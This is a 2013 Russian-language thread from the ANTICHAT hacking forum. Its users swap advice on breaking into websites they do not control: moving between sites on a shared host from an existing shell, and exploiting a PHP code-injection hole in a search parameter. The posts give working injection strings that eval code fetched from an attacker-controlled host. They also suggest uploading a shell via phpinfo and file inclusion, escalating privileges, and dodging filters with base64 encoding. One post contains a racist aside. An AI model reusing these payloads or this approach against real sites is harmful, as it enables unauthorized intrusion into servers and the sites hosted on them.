HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22211  
Старый 14.03.2013, 17:16
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350

Репутация: 0
По умолчанию

Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:

можно ли какнить изменить права на доступ с этих нулевиков в другие папки?
 
Ответить с цитированием

  #22212  
Старый 14.03.2013, 18:36
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от Cherep  
Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:
можно ли какнить изменить права на доступ с этих нулевиков в другие папки?
Можно, если в заливаемой папке полные права или принадлежат одной группе!
 
Ответить с цитированием

  #22213  
Старый 14.03.2013, 18:44
rogatiy
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами:
6944726

Репутация: 0
По умолчанию

Имеется у нас сайт N, а на этом сайте уязвимость /search/?name=, пропускающая PHP-инъекции, то есть запрос /search/?name={${phpinfo()}} выводит phpinfo. В результате бурного гугления пришёл к такому инжекту: name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));.

И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!
 
Ответить с цитированием

  #22214  
Старый 15.03.2013, 02:14
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от rogatiy  
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!
eval(file_get_contents('шелл'));. шелл выполняется, просто прав нет или код шелл даже не исполняется? Если первое, то ищи способы поднять привилегии
 
Ответить с цитированием

  #22215  
Старый 15.03.2013, 02:39
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387

Репутация: 2
По умолчанию

Цитата:
Сообщение от rogatiy  
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!
Локальные файлы инклудятся?

Если можешь проинклудить файл например с папки /tmp/, то попробуй залится через phpinfo )

десять раз так получалось))
 
Ответить с цитированием

  #22216  
Старый 15.03.2013, 15:45
rogatiy
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами:
6944726

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
eval(file_get_contents('шелл'));. шелл выполняется, просто прав нет или код шелл даже не исполняется? Если первое, то ищи способы поднять привилегии
Выполняется, прав нет вообще, даже файлы вывести не может.

Цитата:
Сообщение от GroM88  
Локальные файлы инклудятся?
Если можешь проинклудить файл например с папки /tmp/, то попробуй залится через phpinfo )
десять раз так получалось))
В конкретном случае, который я пытаю сейчас, да, url_include работает, но давайте рассматривать вот такой расклад:

allow_url_fopen On

allow_url_include Off

Понимаю, что шелл надо бы залить, желательно в tmp, ибо там, вроде 777, но как? Можно сразу узнать готовый код? cmd=copy('сайт/шелл.тхт','shell.php'); не выполняется, а cmd=eval(file_put_contents('сайт/шелл.тхт','shell.php')); тоже, а больше функций я и не знаю Если вдруг нужны какие-то ещё данные из phpinfo - пишите.

PS: Как залить через phpinfo то?
 
Ответить с цитированием

  #22217  
Старый 16.03.2013, 17:46
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387

Репутация: 2
По умолчанию

Цитата:
Сообщение от None  
cmd=
Откуда ты взял это cmd?
 
Ответить с цитированием

  #22218  
Старый 16.03.2013, 21:05
rogatiy
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами:
6944726

Репутация: 0
По умолчанию

Цитата:
Сообщение от rogatiy  
В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
Вот.
 
Ответить с цитированием

  #22219  
Старый 16.03.2013, 21:18
blesse
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126

Репутация: 1
По умолчанию

Цитата:
Сообщение от rogatiy  
Вот.
Что вы мозги себе еб***. заливаешь на хостинг\дедик\к себе на комп если ип-белый код шелла без в формате .txt.

далее с бэкдора запускаешь=>?cmd=eval(file_get_contents( 'http://myhosting/fileScodomShell'a.txt')); =>PROFIT!!! всегда робит ,а там уже делай, что хочешь...если фильтры юзай char/base64_decode
 
Ответить с цитированием

  #22220  
Старый 16.03.2013, 21:32
rogatiy
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами:
6944726

Репутация: 0
По умолчанию

Цитата:
Сообщение от blesse  
Что вы мозги себе еб***. заливаешь на хостинг\дедик\к себе на комп если ип-белый код шелла без в формате .txt.
далее с бэкдора запускаешь=>?cmd=eval(file_get_contents( 'http://myhosting/fileScodomShell'a.txt')); =>PROFIT!!! всегда робит ,а там уже делай, что хочешь...если фильтры юзай char/base64_decode
Вопрос - это ты не умеешь читать, или я объяснять? Шелл выводится, работает, но прав нет. Вообще. Даже файлы не отображает.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.